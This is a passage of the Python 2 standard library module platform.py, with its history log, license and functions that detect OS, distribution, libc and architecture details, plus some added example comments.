# Charles G Waldman, David Arnold, Gordon McMillan, Ben Darnell,
# Jeff Bauer, Cliff Crawford, Ivan Van Laningham, Josef
# Betancourt, Randall Hopper, Karl Putland, John Farrell, Greg
# Andruk, Just van Rossum, Thomas Heller, Mark R. Levinson, Mark
# Hammond, Bill Tutt, Hans Nowak, Uwe Zessin (OpenVMS support),
# Colin Kong, Trent Mick, Guido van Rossum, Anthony Baxter, Steve
# Dower
#
# History:
#
# <see CVS and SVN checkin messages for history>
#
# 1.0.8 - changed Windows support to read version from kernel32.dll
# 1.0.7 - added DEV_NULL
# 1.0.6 - added linux_distribution()
# 1.0.5 - fixed Java support to allow running the module on Jython
# 1.0.4 - added IronPython support
# 1.0.3 - added normalization of Windows system name
# 1.0.2 - added more Windows support
# 1.0.1 - reformatted to make doc.py happy
# 1.0.0 - reformatted a bit and checked into Python CVS
# 0.8.0 - added sys.version parser and various new access
# APIs (python_version(), python_compiler(), etc.)
# 0.7.2 - fixed architecture() to use sizeof(pointer) where available
# 0.7.1 - added support for Caldera OpenLinux
# 0.7.0 - some fixes for WinCE; untabified the source file
# 0.6.2 - support for OpenVMS - requires version 1.5.2-V006 or higher and
# vms_lib.getsyi() configured
# 0.6.1 - added code to prevent 'uname -p' on platforms which are
# known not to support it
# 0.6.0 - fixed win32_ver() to hopefully work on Win95,98,NT and Win2k;
# did some cleanup of the interfaces - some APIs have changed
# 0.5.5 - fixed another type in the MacOS code... should have
# used more coffee today ;-)
# 0.5.4 - fixed a few typos in the MacOS code
# 0.5.3 - added experimental MacOS support; added better popen()
# workarounds in _syscmd_ver() -- still not 100% elegant
# though
# 0.5.2 - fixed uname() to return '' instead of 'unknown' in all
# return values (the system uname command tends to return
# 'unknown' instead of just leaving the field empty)
# 0.5.1 - included code for slackware dist; added exception handlers
# to cover up situations where platforms don't have os.popen
# (e.g. Mac) or fail on socket.gethostname(); fixed libc
# detection RE
# 0.5.0 - changed the API names referring to system commands to *syscmd*;
# added java_ver(); made syscmd_ver() a private
# API (was system_ver() in previous versions) -- use uname()
# instead; extended the win32_ver() to also return processor
# type information
# 0.4.0 - added win32_ver() and modified the platform() output for WinXX
# 0.3.4 - fixed a bug in _follow_symlinks()
# 0.3.3 - fixed popen() and "file" command invocation bugs
# 0.3.2 - added architecture() API and support for it in platform()
# 0.3.1 - fixed syscmd_ver() RE to support Windows NT
# 0.3.0 - added system alias support
# 0.2.3 - removed 'wince' again... oh well.
# 0.2.2 - added 'wince' to syscmd_ver() supported platforms
# 0.2.1 - added cache logic and changed the platform string format
# 0.2.0 - changed the API to use functions instead of module globals
#         since some actions take too long to be run on module import
# 0.1.0 - first release
#
# You can always get the latest version of this module at:
#
# http://www.egenix.com/files/python/platform.py
#
# If that URL should fail, try contacting the author.
__copyright__ = """
Copyright (c) 1999-2000, Marc-Andre Lemburg; mailto:[email protected]
Copyright (c) 2000-2010, eGenix.com Software GmbH; mailto:[email protected]
Permission to use, copy, modify, and distribute this software and its
documentation for any purpose and without fee or royalty is hereby granted,
provided that the above copyright notice appear in all copies and that
both that copyright notice and this permission notice appear in
supporting documentation or portions thereof, including modifications,
that you make.
EGENIX.COM SOFTWARE GMBH DISCLAIMS ALL WARRANTIES WITH REGARD TO
THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS, IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL,
INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
WITH THE USE OR PERFORMANCE OF THIS SOFTWARE !
"""
__version__ = '1.0.7'
import sys,string,os,re
### Globals & Constants
# Determine the platform's /dev/null device
try:
DEV_NULL = os.devnull
except AttributeError:
# os.devnull was added in Python 2.4, so emulate it for earlier
# Python versions
if sys.platform in ('dos','win32','win16','os2'):
# Use the old CP/M NUL as device name
DEV_NULL = 'NUL'
else:
# Standard Unix uses /dev/null
DEV_NULL = '/dev/null'
### Platform specific APIs
_libc_search = re.compile(r'(__libc_init)'
'|'
'(GLIBC_([0-9.]+))'
'|'
'(libc(_\w+)?\.so(?:\.(\d[0-9.]*))?)')
def libc_ver(executable=sys.executable,lib='',version='',
chunksize=2048):
""" Tries to determine the libc version that the file executable
(which defaults to the Python interpreter) is linked against.
Returns a tuple of strings (lib,version) which default to the
given parameters in case the lookup fails.
Note that the function has intimate knowledge of how different
libc versions add symbols to the executable and thus is probably
only useable for executables compiled using gcc.
The file is read and scanned in chunks of chunksize bytes.
"""
if hasattr(os.path, 'realpath'):
# Python 2.2 introduced os.path.realpath(); it is used
# here to work around problems with Cygwin not being
# able to open symlinks for reading
executable = os.path.realpath(executable)
f = open(executable,'rb')
binary = f.read(chunksize)
pos = 0
while 1:
m = _libc_search.search(binary,pos)
if not m:
binary = f.read(chunksize)
if not binary:
break
pos = 0
continue
libcinit,glibc,glibcversion,so,threads,soversion = m.groups()
if libcinit and not lib:
lib = 'libc'
elif glibc:
if lib != 'glibc':
lib = 'glibc'
version = glibcversion
elif glibcversion > version:
version = glibcversion
elif so:
if lib != 'glibc':
lib = 'libc'
if soversion and soversion > version:
version = soversion
if threads and version[-len(threads):] != threads:
version = version + threads
pos = m.end()
f.close()
return lib,version
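# Illustrative example (values vary by system and are only an assumption of
# typical output on a glibc-based Linux host):
#
#   >>> libc_ver()            # doctest: +SKIP
#   ('glibc', '2.17')
#   >>> libc_ver('/bin/ls')   # doctest: +SKIP
#   ('glibc', '2.17')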
def _dist_try_harder(distname,version,id):
""" Tries some special tricks to get the distribution
information in case the default method fails.
Currently supports older SuSE Linux, Caldera OpenLinux and
Slackware Linux distributions.
"""
if os.path.exists('/var/adm/inst-log/info'):
# SuSE Linux stores distribution information in that file
info = open('/var/adm/inst-log/info').readlines()
distname = 'SuSE'
for line in info:
tv = string.split(line)
if len(tv) == 2:
tag,value = tv
else:
continue
if tag == 'MIN_DIST_VERSION':
version = string.strip(value)
elif tag == 'DIST_IDENT':
values = string.split(value,'-')
id = values[2]
return distname,version,id
if os.path.exists('/etc/.installed'):
# Caldera OpenLinux has some infos in that file (thanks to Colin Kong)
info = open('/etc/.installed').readlines()
for line in info:
pkg = string.split(line,'-')
if len(pkg) >= 2 and pkg[0] == 'OpenLinux':
# XXX does Caldera support non Intel platforms ? If yes,
# where can we find the needed id ?
return 'OpenLinux',pkg[1],id
if os.path.isdir('/usr/lib/setup'):
# Check for slackware version tag file (thanks to Greg Andruk)
verfiles = os.listdir('/usr/lib/setup')
for n in range(len(verfiles)-1, -1, -1):
if verfiles[n][:14] != 'slack-version-':
del verfiles[n]
if verfiles:
verfiles.sort()
distname = 'slackware'
version = verfiles[-1][14:]
return distname,version,id
return distname,version,id
_release_filename = re.compile(r'(\w+)[-_](release|version)')
_lsb_release_version = re.compile(r'(.+)'
' release '
'([\d.]+)'
'[^(]*(?:\((.+)\))?')
_release_version = re.compile(r'([^0-9]+)'
'(?: release )?'
'([\d.]+)'
'[^(]*(?:\((.+)\))?')
# See also http://www.novell.com/coolsolutions/feature/11251.html
# and http://linuxmafia.com/faq/Admin/release-files.html
# and http://data.linux-ntfs.org/rpm/whichrpm
# and http://www.die.net/doc/linux/man/man1/lsb_release.1.html
_supported_dists = (
'SuSE', 'debian', 'fedora', 'redhat', 'centos',
'mandrake', 'mandriva', 'rocks', 'slackware', 'yellowdog', 'gentoo',
'UnitedLinux', 'turbolinux')
def _parse_release_file(firstline):
# Default to empty 'version' and 'id' strings. Both defaults are used
# when 'firstline' is empty. 'id' defaults to empty when an id can not
# be deduced.
version = ''
id = ''
# Parse the first line
m = _lsb_release_version.match(firstline)
if m is not None:
# LSB format: "distro release x.x (codename)"
return tuple(m.groups())
# Pre-LSB format: "distro x.x (codename)"
m = _release_version.match(firstline)
if m is not None:
return tuple(m.groups())
# Unknown format... take the first two words
l = string.split(string.strip(firstline))
if l:
version = l[0]
if len(l) > 1:
id = l[1]
return '', version, id
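# Illustrative examples (not part of the original module) of the release file
# formats parsed above; a line matching neither pattern falls back to the
# first two whitespace-separated words.
#
#   >>> _parse_release_file('Fedora release 20 (Heisenbug)')
#   ('Fedora', '20', 'Heisenbug')
#   >>> _parse_release_file('CentOS release 6.5 (Final)')
#   ('CentOS', '6.5', 'Final')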
def linux_distribution(distname='', version='', id='',
supported_dists=_supported_dists,
full_distribution_name=1):
""" Tries to determine the name of the Linux OS distribution name.
The function first looks for a distribution release file in
/etc and then reverts to _dist_try_harder() in case no
suitable files are found.
supported_dists may be given to define the set of Linux
distributions to look for. It defaults to a list of currently
supported Linux distributions identified by their release file
name.
If full_distribution_name is true (default), the full
distribution read from the OS is returned. Otherwise the short
name taken from supported_dists is used.
Returns a tuple (distname,version,id) which default to the
args given as parameters.
"""
try:
etc = os.listdir('/etc')
except os.error:
# Probably not a Unix system
return distname,version,id
etc.sort()
for file in etc:
m = _release_filename.match(file)
if m is not None:
_distname,dummy = m.groups()
if _distname in supported_dists:
distname = _distname
break
else:
return _dist_try_harder(distname,version,id)
# Read the first line
f = open('/etc/'+file, 'r')
firstline = f.readline()
f.close()
_distname, _version, _id = _parse_release_file(firstline)
if _distname and full_distribution_name:
distname = _distname
if _version:
version = _version
if _id:
id = _id
return distname, version, id
# To maintain backwards compatibility:
def dist(distname='',version='',id='',
supported_dists=_supported_dists):
""" Tries to determine the name of the Linux OS distribution name.
The function first looks for a distribution release file in
/etc and then reverts to _dist_try_harder() in case no
suitable files are found.
Returns a tuple (distname,version,id) which default to the
args given as parameters.
"""
return linux_distribution(distname, version, id,
supported_dists=supported_dists,
full_distribution_name=0)
class _popen:
""" Fairly portable (alternative) popen implementation.
This is mostly needed in case os.popen() is not available, or
doesn't work as advertised, e.g. in Win9X GUI programs like
PythonWin or IDLE.
Writing to the pipe is currently not supported.
"""
tmpfile = ''
pipe = None
bufsize = None
mode = 'r'
def __init__(self,cmd,mode='r',bufsize=None):
if mode != 'r':
raise ValueError,'popen()-emulation only supports read mode'
import tempfile
self.tmpfile = tmpfile = tempfile.mktemp()
os.system(cmd + ' > %s' % tmpfile)
self.pipe = open(tmpfile,'rb')
self.bufsize = bufsize
self.mode = mode
def read(self):
return self.pipe.read()
def readlines(self):
if self.bufsize is not None:
return self.pipe.readlines()
def close(self,
remove=os.unlink,error=os.error):
if self.pipe:
rc = self.pipe.close()
else:
rc = 255
if self.tmpfile:
try:
remove(self.tmpfile)
except error:
pass
return rc
# Alias
__del__ = close
def popen(cmd, mode='r', bufsize=None):
""" Portable popen() interface.
"""
# Find a working popen implementation preferring win32pipe.popen
# over os.popen over _popen
popen = None
if os.environ.get('OS','') == 'Windows_NT':
# On NT win32pipe should work; on Win9x it hangs due to bugs
# in the MS C lib (see MS KnowledgeBase article Q150956)
try:
import win32pipe
except ImportError:
pass
else:
popen = win32pipe.popen
if popen is None:
if hasattr(os,'popen'):
popen = os.popen
# Check whether it works... it doesn't in GUI programs
# on Windows platforms
if sys.platform == 'win32': # XXX Others too ?
try:
popen('')
except os.error:
popen = _popen
else:
popen = _popen
if bufsize is None:
return popen(cmd,mode)
else:
return popen(cmd,mode,bufsize)
def _norm_version(version, build=''):
""" Normalize the version and build strings and return a single
version string using the format major.minor.build (or patchlevel).
"""
l = string.split(version,'.')
if build:
l.append(build)
try:
ints = map(int,l)
except ValueError:
strings = l
else:
strings = map(str,ints)
version = string.join(strings[:3],'.')
return version
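# Illustrative examples (not part of the original module): numeric parts lose
# their zero padding and an optional build number is appended.
#
#   >>> _norm_version('5.00.2195')
#   '5.0.2195'
#   >>> _norm_version('6.1', '7601')
#   '6.1.7601'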
_ver_output = re.compile(r'(?:([\w ]+) ([\w.]+) '
'.*'
'\[.* ([\d.]+)\])')
# Examples of VER command output:
#
# Windows 2000: Microsoft Windows 2000 [Version 5.00.2195]
# Windows XP: Microsoft Windows XP [Version 5.1.2600]
# Windows Vista: Microsoft Windows [Version 6.0.6002]
#
# Note that the "Version" string gets localized on different
# Windows versions.
def _syscmd_ver(system='', release='', version='',
supported_platforms=('win32','win16','dos','os2')):
""" Tries to figure out the OS version used and returns
a tuple (system,release,version).
It uses the "ver" shell command for this which is known
to exists on Windows, DOS and OS/2. XXX Others too ?
In case this fails, the given parameters are used as
defaults.
"""
if sys.platform not in supported_platforms:
return system,release,version
# Try some common cmd strings
for cmd in ('ver','command /c ver','cmd /c ver'):
try:
pipe = popen(cmd)
info = pipe.read()
if pipe.close():
raise os.error,'command failed'
# XXX How can I suppress shell errors from being written
# to stderr ?
except os.error,why:
#print 'Command %s failed: %s' % (cmd,why)
continue
except IOError,why:
#print 'Command %s failed: %s' % (cmd,why)
continue
else:
break
else:
return system,release,version
# Parse the output
info = string.strip(info)
m = _ver_output.match(info)
if m is not None:
system,release,version = m.groups()
# Strip trailing dots from version and release
if release[-1] == '.':
release = release[:-1]
if version[-1] == '.':
version = version[:-1]
# Normalize the version and build strings (eliminating additional
# zeros)
version = _norm_version(version)
return system,release,version
_WIN32_CLIENT_RELEASES = {
(5, 0): "2000",
(5, 1): "XP",
# Strictly, 5.2 client is XP 64-bit, but platform.py historically
# has always called it 2003 Server
(5, 2): "2003Server",
(5, None): "post2003",
(6, 0): "Vista",
(6, 1): "7",
(6, 2): "8",
(6, 3): "8.1",
(6, None): "post8.1",
(10, 0): "10",
(10, None): "post10",
}
# Server release name lookup will default to client names if necessary
_WIN32_SERVER_RELEASES = {
(5, 2): "2003Server",
(6, 0): "2008Server",
(6, 1): "2008ServerR2",
(6, 2): "2012Server",
(6, 3): "2012ServerR2",
(6, None): "post2012ServerR2",
}
def _get_real_winver(maj, min, build):
if maj < 6 or (maj == 6 and min < 2):
return maj, min, build
from ctypes import (c_buffer, POINTER, byref, create_unicode_buffer,
Structure, WinDLL, _Pointer)
from ctypes.wintypes import DWORD, HANDLE
class VS_FIXEDFILEINFO(Structure):
_fields_ = [
("dwSignature", DWORD),
("dwStrucVersion", DWORD),
("dwFileVersionMS", DWORD),
("dwFileVersionLS", DWORD),
("dwProductVersionMS", DWORD),
("dwProductVersionLS", DWORD),
("dwFileFlagsMask", DWORD),
("dwFileFlags", DWORD),
("dwFileOS", DWORD),
("dwFileType", DWORD),
("dwFileSubtype", DWORD),
("dwFileDateMS", DWORD),
("dwFileDateLS", DWORD),
]
class PVS_FIXEDFILEINFO(_Pointer):
_type_ = VS_FIXEDFILEINFO
kernel32 = WinDLL('kernel32')
version = WinDLL('version')
# We will immediately double the length up to MAX_PATH, but the
# path may be longer, so we retry until the returned string is
# shorter than our buffer.
name_len = actual_len = 130
while actual_len == name_len:
name_len *= 2
name = create_unicode_buffer(name_len)
actual_len = kernel32.GetModuleFileNameW(HANDLE(kernel32._handle),
name, len(name))
if not actual_len:
return maj, min, build
size = version.GetFileVersionInfoSizeW(name, None)
if not size:
return maj, min, build
ver_block = c_buffer(size)
if (not version.GetFileVersionInfoW(name, None, size, ver_block) or
not ver_block):
return maj, min, build
pvi = PVS_FIXEDFILEINFO()
if not version.VerQueryValueW(ver_block, "", byref(pvi), byref(DWORD())):
return maj, min, build
maj = pvi.contents.dwProductVersionMS >> 16
min = pvi.contents.dwProductVersionMS & 0xFFFF
build = pvi.contents.dwProductVersionLS >> 16
return maj, min, build
def win32_ver(release='', version='', csd='', ptype=''):
try:
from sys import getwindowsversion
except ImportError:
return release, version, csd, ptype
try:
from winreg import OpenKeyEx, QueryValueEx, CloseKey, HKEY_LOCAL_MACHINE
except ImportError:
from _winreg import OpenKeyEx, QueryValueEx, CloseKey, HKEY_LOCAL_MACHINE
winver = getwindowsversion()
maj, min, build = _get_real_winver(*winver[:3])
version = '{0}.{1}.{2}'.format(maj, min, build)
release = (_WIN32_CLIENT_RELEASES.get((maj, min)) or
_WIN32_CLIENT_RELEASES.get((maj, None)) or
release)
# getwindowsversion() reflect the compatibility mode Python is
# running under, and so the service pack value is only going to be
# valid if the versions match.
if winver[:2] == (maj, min):
try:
csd = 'SP{}'.format(winver.service_pack_major)
except AttributeError:
if csd[:13] == 'Service Pack ':
csd = 'SP' + csd[13:]
# VER_NT_SERVER = 3
if getattr(winver, 'product_type', None) == 3:
release = (_WIN32_SERVER_RELEASES.get((maj, min)) or
_WIN32_SERVER_RELEASES.get((maj, None)) or
release)
key = None
try:
key = OpenKeyEx(HKEY_LOCAL_MACHINE,
r'SOFTWARE\Microsoft\Windows NT\CurrentVersion')
ptype = QueryValueEx(key, 'CurrentType')[0]
except:
pass
finally:
if key:
CloseKey(key)
return release, version, csd, ptype
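# Illustrative example (machine dependent; the values are only an assumption of
# typical output on a Windows 7 SP1 installation):
#
#   >>> win32_ver()    # doctest: +SKIP
#   ('7', '6.1.7601', 'SP1', 'Multiprocessor Free')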
def _mac_ver_lookup(selectors,default=None):
from gestalt import gestalt
import MacOS
l = []
append = l.append
for selector in selectors:
try:
append(gestalt(selector))
except (RuntimeError, MacOS.Error):
append(default)
return l
def _bcd2str(bcd):
return hex(bcd)[2:]
def _mac_ver_gestalt():
"""
Thanks to Mark R. Levinson for mailing documentation links and
code examples for this function. Documentation for the
gestalt() API is available online at:
http://www.rgaros.nl/gestalt/
"""
# Check whether the version info module is available
try:
import gestalt
import MacOS
except ImportError:
return None
# Get the infos
sysv,sysa = _mac_ver_lookup(('sysv','sysa'))
# Decode the infos
if sysv:
major = (sysv & 0xFF00) >> 8
minor = (sysv & 0x00F0) >> 4
patch = (sysv & 0x000F)
if (major, minor) >= (10, 4):
            # the 'sysv' gestalt cannot return patchlevels
# higher than 9. Apple introduced 3 new
# gestalt codes in 10.4 to deal with this
# issue (needed because patch levels can
# run higher than 9, such as 10.4.11)
major,minor,patch = _mac_ver_lookup(('sys1','sys2','sys3'))
release = '%i.%i.%i' %(major, minor, patch)
else:
release = '%s.%i.%i' % (_bcd2str(major),minor,patch)
if sysa:
machine = {0x1: '68k',
0x2: 'PowerPC',
0xa: 'i386'}.get(sysa,'')
versioninfo=('', '', '')
return release,versioninfo,machine
def _mac_ver_xml():
fn = '/System/Library/CoreServices/SystemVersion.plist'
if not os.path.exists(fn):
return None
try:
import plistlib
except ImportError:
return None
pl = plistlib.readPlist(fn)
release = pl['ProductVersion']
versioninfo=('', '', '')
machine = os.uname()[4]
if machine in ('ppc', 'Power Macintosh'):
# for compatibility with the gestalt based code
machine = 'PowerPC'
return release,versioninfo,machine
def mac_ver(release='',versioninfo=('','',''),machine=''):
""" Get MacOS version information and return it as tuple (release,
versioninfo, machine) with versioninfo being a tuple (version,
dev_stage, non_release_version).
Entries which cannot be determined are set to the parameter values
which default to ''. All tuple entries are strings.
"""
# First try reading the information from an XML file which should
# always be present
info = _mac_ver_xml()
if info is not None:
return info
# If that doesn't work for some reason fall back to reading the
# information using gestalt calls.
info = _mac_ver_gestalt()
if info is not None:
return info
# If that also doesn't work return the default values
return release,versioninfo,machine
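# Illustrative example (machine dependent; the values are only an assumption of
# typical output on an OS X host):
#
#   >>> mac_ver()    # doctest: +SKIP
#   ('10.9.5', ('', '', ''), 'x86_64')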
def _java_getprop(name,default):
from java.lang import System
try:
value = System.getProperty(name)
if value is None:
return default
return value
except AttributeError:
return default
def java_ver(release='',vendor='',vminfo=('','',''),osinfo=('','','')):
""" Version interface for Jython.
Returns a tuple (release,vendor,vminfo,osinfo) with vminfo being
a tuple (vm_name,vm_release,vm_vendor) and osinfo being a
tuple (os_name,os_version,os_arch).
Values which cannot be determined are set to the defaults
given as parameters (which all default to '').
"""
# Import the needed APIs
try:
import java.lang
except ImportError:
return release,vendor,vminfo,osinfo
vendor = _java_getprop('java.vendor', vendor)
release = _java_getprop('java.version', release)
vm_name, vm_release, vm_vendor = vminfo
vm_name = _java_getprop('java.vm.name', vm_name)
vm_vendor = _java_getprop('java.vm.vendor', vm_vendor)
vm_release = _java_getprop('java.vm.version', vm_release)
vminfo = vm_name, vm_release, vm_vendor
os_name, os_version, os_arch = osinfo
os_arch = _java_getprop('java.os.arch', os_arch)
os_name = _java_getprop('java.os.name', os_name)
os_version = _java_getprop('java.os.version', os_version)
osinfo = os_name, os_version, os_arch
return release, vendor, vminfo, osinfo
### System name aliasing
def system_alias(system,release,version):
""" Returns (system,release,version) aliased to common
marketing names used for some systems.
It also does some reordering of the information in some cases
where it would otherwise cause confusion.
"""
if system == 'Rhapsody':
# Apple's BSD derivative
# XXX How can we determine the marketing release number ?
return 'MacOS X Server',system+release,version
elif system == 'SunOS':
# Sun's OS
if release < '5':
# These releases use the old name SunOS
return system,release,version
# Modify release (marketing release = SunOS release - 3)
l = string.split(release,'.')
if l:
try:
major = int(l[0])
except ValueError:
pass
else:
major = major - 3
l[0] = str(major)
release = string.join(l,'.')
if release < '6':
system = 'Solaris'
else:
# XXX Whatever the new SunOS marketing name is...
system = 'Solaris'
elif system == 'IRIX64':
# IRIX reports IRIX64 on platforms with 64-bit support; yet it
# is really a version and not a different platform, since 32-bit
        # apps are also supported.
system = 'IRIX'
if version:
version = version + ' (64bit)'
else:
version = '64bit'
elif system in ('win32','win16'):
# In case one of the other tricks
system = 'Windows'
return system,release,version
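# Illustrative examples (not part of the original module) of the aliasing done
# above; the SunOS marketing release is the uname release minus 3.
#
#   >>> system_alias('SunOS', '5.9', 'Generic_118558-34')
#   ('Solaris', '2.9', 'Generic_118558-34')
#   >>> system_alias('IRIX64', '6.5', '01091820')
#   ('IRIX', '6.5', '01091820 (64bit)')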
### Various internal helpers
def _platform(*args):
""" Helper to format the platform string in a filename
compatible format e.g. "system-version-machine".
"""
# Format the platform string
platform = string.join(
map(string.strip,
filter(len, args)),
'-')
# Cleanup some possible filename obstacles...
replace = string.replace
platform = replace(platform,' ','_')
platform = replace(platform,'/','-')
platform = replace(platform,'\\','-')
platform = replace(platform,':','-')
platform = replace(platform,';','-')
platform = replace(platform,'"','-')
platform = replace(platform,'(','-')
platform = replace(platform,')','-')
# No need to report 'unknown' information...
platform = replace(platform,'unknown','')
# Fold '--'s and remove trailing '-'
while 1:
cleaned = replace(platform,'--','-')
if cleaned == platform:
break
platform = cleaned
while platform[-1] == '-':
platform = platform[:-1]
return platform
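# Illustrative examples (not part of the original module): the arguments are
# joined with '-' and filename-unfriendly characters are normalized.
#
#   >>> _platform('Windows', '7', '6.1.7601', 'SP1')
#   'Windows-7-6.1.7601-SP1'
#   >>> _platform('Linux', '', 'x86_64', 'with glibc')
#   'Linux-x86_64-with_glibc'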
def _node(default=''):
""" Helper to determine the node name of this machine.
"""
try:
import socket
except ImportError:
# No sockets...
return default
try:
return socket.gethostname()
except socket.error:
# Still not working...
return default
# os.path.abspath is new in Python 1.5.2:
if not hasattr(os.path,'abspath'):
def _abspath(path,
isabs=os.path.isabs,join=os.path.join,getcwd=os.getcwd,
normpath=os.path.normpath):
if not isabs(path):
path = join(getcwd(), path)
return normpath(path)
else:
_abspath = os.path.abspath
def _follow_symlinks(filepath):
""" In case filepath is a symlink, follow it until a
real file is reached.
"""
filepath = _abspath(filepath)
while os.path.islink(filepath):
filepath = os.path.normpath(
os.path.join(os.path.dirname(filepath),os.readlink(filepath)))
return filepath
def _syscmd_uname(option,default=''):
""" Interface to the system's uname command.
"""
if sys.platform in ('dos','win32','win16','os2'):
# XXX Others too ?
return default
try:
f = os.popen('uname %s 2> %s' % (option, DEV_NULL))
except (AttributeError,os.error):
return default
output = string.strip(f.read())
rc = f.close()
if not output or rc:
return default
else:
return output
def _syscmd_file(target,default=''):
""" Interface to the system's file command.
The function uses the -b option of the file command to have it
        omit the filename in its output and if possible the -L option
to have the command follow symlinks. It returns default in
case the command should fail.
"""
# We do the import here to avoid a bootstrap issue.
# See c73b90b6dadd changeset.
#
# [..]
# ranlib libpython2.7.a
# gcc -o python \
# Modules/python.o \
# libpython2.7.a -lsocket -lnsl -ldl -lm
# Traceback (most recent call last):
# File "./setup.py", line 8, in <module>
# from platform import machine as platform_machine
# File "[..]/build/Lib/platform.py", line 116, in <module>
# import sys,string,os,re,subprocess
# File "[..]/build/Lib/subprocess.py", line 429, in <module>
# import select
# ImportError: No module named select
import subprocess
if sys.platform in ('dos','win32','win16','os2'):
# XXX Others too ?
return default
target = _follow_symlinks(target)
try:
proc = subprocess.Popen(['file', target],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
except (AttributeError,os.error):
return default
output = proc.communicate()[0]
rc = proc.wait()
if not output or rc:
return default
else:
return output
### Information about the used architecture
# Default values for architecture; non-empty strings override the
# defaults given as parameters
_default_architecture = {
'win32': ('','WindowsPE'),
'win16': ('','Windows'),
'dos': ('','MSDOS'),
}
_architecture_split = re.compile(r'[\s,]').split
def architecture(executable=sys.executable,bits='',linkage=''):
""" Queries the given executable (defaults to the Python interpreter
binary) for various architecture information.
Returns a tuple (bits,linkage) which contains information about
the bit architecture and the linkage format used for the
executable. Both values are returned as strings.
Values that cannot be determined are returned as given by the
parameter presets. If bits is given as '', the sizeof(pointer)
(or sizeof(long) on Python version < 1.5.2) is used as
indicator for the supported pointer size.
The function relies on the system's "file" command to do the
actual work. This is available on most if not all Unix
platforms. On some non-Unix platforms where the "file" command
does not exist and the executable is set to the Python interpreter
binary defaults from _default_architecture are used.
"""
# Use the sizeof(pointer) as default number of bits if nothing
# else is given as default.
if not bits:
import struct
try:
size = struct.calcsize('P')
except struct.error:
# Older installations can only query longs
size = struct.calcsize('l')
bits = str(size*8) + 'bit'
# Get data from the 'file' system command
if executable:
output = _syscmd_file(executable, '')
else:
output = ''
if not output and \
executable == sys.executable:
# "file" command did not return anything; we'll try to provide
# some sensible defaults then...
if sys.platform in _default_architecture:
b, l = _default_architecture[sys.platform]
if b:
bits = b
if l:
linkage = l
return bits, linkage
# Split the output into a list of strings omitting the filename
fileout = _architecture_split(output)[1:]
if 'executable' not in fileout:
# Format not supported
return bits,linkage
# Bits
if '32-bit' in fileout:
bits = '32bit'
elif 'N32' in fileout:
# On Irix only
bits = 'n32bit'
elif '64-bit' in fileout:
bits = '64bit'
# Linkage
if 'ELF' in fileout:
linkage = 'ELF'
elif 'PE' in fileout:
# E.g. Windows uses this format
if 'Windows' in fileout:
linkage = 'WindowsPE'
else:
linkage = 'PE'
elif 'COFF' in fileout:
linkage = 'COFF'
elif 'MS-DOS' in fileout:
linkage = 'MSDOS'
else:
# XXX the A.OUT format also falls under this class...
pass
return bits,linkage
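# Illustrative examples (interpreter and OS dependent; the values are only an
# assumption of typical output):
#
#   >>> architecture()    # doctest: +SKIP
#   ('64bit', 'ELF')          # e.g. CPython on 64-bit Linux
#   >>> architecture()    # doctest: +SKIP
#   ('32bit', 'WindowsPE')    # e.g. a 32-bit python.exe on Windows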
### Portable uname() interface
_uname_cache = None
def uname():
""" Fairly portable uname interface. Returns a tuple
of strings (system,node,release,version,machine,processor)
identifying the underlying platform.
Note that unlike the os.uname function this also returns
possible processor information as an additional tuple entry.
Entries which cannot be determined are set to ''.
"""
global _uname_cache
no_os_uname = 0
if _uname_cache is not None:
return _uname_cache
processor = ''
# Get some infos from the builtin os.uname API...
try:
system,node,release,version,machine = os.uname()
except AttributeError:
no_os_uname = 1
if no_os_uname or not filter(None, (system, node, release, version, machine)):
# Hmm, no there is either no uname or uname has returned
#'unknowns'... we'll have to poke around the system then.
if no_os_uname:
system = sys.platform
release = ''
version = ''
node = _node()
machine = ''
use_syscmd_ver = 1
# Try win32_ver() on win32 platforms
if system == 'win32':
release,version,csd,ptype = win32_ver()
if release and version:
use_syscmd_ver = 0
# Try to use the PROCESSOR_* environment variables
# available on Win XP and later; see
# http://support.microsoft.com/kb/888731 and
# http://www.geocities.com/rick_lively/MANUALS/ENV/MSWIN/PROCESSI.HTM
if not machine:
# WOW64 processes mask the native architecture
if "PROCESSOR_ARCHITEW6432" in os.environ:
machine = os.environ.get("PROCESSOR_ARCHITEW6432", '')
else:
machine = os.environ.get('PROCESSOR_ARCHITECTURE', '')
if not processor:
processor = os.environ.get('PROCESSOR_IDENTIFIER', machine)
# Try the 'ver' system command available on some
# platforms
if use_syscmd_ver:
system,release,version = _syscmd_ver(system)
# Normalize system to what win32_ver() normally returns
# (_syscmd_ver() tends to return the vendor name as well)
if system == 'Microsoft Windows':
system = 'Windows'
elif system == 'Microsoft' and release == 'Windows':
# Under Windows Vista and Windows Server 2008,
# Microsoft changed the output of the ver command. The
# release is no longer printed. This causes the
# system and release to be misidentified.
system = 'Windows'
if '6.0' == version[:3]:
release = 'Vista'
else:
release = ''
# In case we still don't know anything useful, we'll try to
# help ourselves
if system in ('win32','win16'):
if not version:
if system == 'win32':
version = '32bit'
else:
version = '16bit'
system = 'Windows'
elif system[:4] == 'java':
release,vendor,vminfo,osinfo = java_ver()
system = 'Java'
version = string.join(vminfo,', ')
if not version:
version = vendor
# System specific extensions
if system == 'OpenVMS':
# OpenVMS seems to have release and version mixed up
if not release or release == '0':
release = version
version = ''
# Get processor information
try:
import vms_lib
except ImportError:
pass
else:
csid, cpu_number = vms_lib.getsyi('SYI$_CPU',0)
if (cpu_number >= 128):
processor = 'Alpha'
else:
processor = 'VAX'
if not processor:
# Get processor information from the uname system command
processor = _syscmd_uname('-p','')
#If any unknowns still exist, replace them with ''s, which are more portable
if system == 'unknown':
system = ''
if node == 'unknown':
node = ''
if release == 'unknown':
release = ''
if version == 'unknown':
version = ''
if machine == 'unknown':
machine = ''
if processor == 'unknown':
processor = ''
# normalize name
if system == 'Microsoft' and release == 'Windows':
system = 'Windows'
release = 'Vista'
_uname_cache = system,node,release,version,machine,processor
return _uname_cache
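# Illustrative example (machine specific; the values are only an assumption of
# typical output on a Linux host):
#
#   >>> uname()    # doctest: +SKIP
#   ('Linux', 'myhost', '3.10.0-229.el7.x86_64',
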